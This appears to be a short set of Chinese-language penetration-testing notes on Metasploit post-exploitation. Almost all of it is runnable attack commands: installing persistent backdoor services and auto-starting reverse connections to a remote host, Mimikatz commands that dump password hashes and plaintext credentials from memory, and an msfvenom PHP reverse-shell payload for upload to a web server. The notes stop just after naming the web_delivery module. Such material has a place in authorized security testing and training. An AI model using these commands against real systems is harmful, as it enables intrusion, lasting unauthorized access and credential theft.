持久shell
run metsvc -A 再目标打开一个端口,创建一个服务,上传执行文件
不支持加密,不支持身份认证
连接目标
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1
另外一种,默认使用反向连接
run persistence -h
延迟10秒启动,重启时自动反向连接
run persistence -X -i 10 -p 4444 -r 1.1.1.1
run persistence -U -i 20 -p 4444 -r 1.1.1.1
run persistence -S -i 20 -p 4444 -r 1.1.1.1
Mimikatz
获取 msv ssp tspkg livessp 身份认证方式的凭据
wdigest 、kerbers查询内存中明文的密码
mimikatz_command -f a:: 通过犯错来获取有哪些模块
mimikatz_command -f samdump::hashes 查看bootkey lm/ntlm hash
mimikatz_command -f handle::list 查看当前系统进程,也可以停
mimikatz_command -f service::list 查看有哪些服务,可以停
mimikatz_command -f crypto::listProviders 查看支持的加密套件
mimikatz_command -f winmine::infos 查看雷的信息,这是一个关于扫雷的模块
PHP shell
java的也行,asp的也行
msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f
raw -o a.php
上传到服务器,用浏览器访问,msf侦听
Web Delivery
利用系统代码执行漏洞
use exploit/multi/script/web_delivery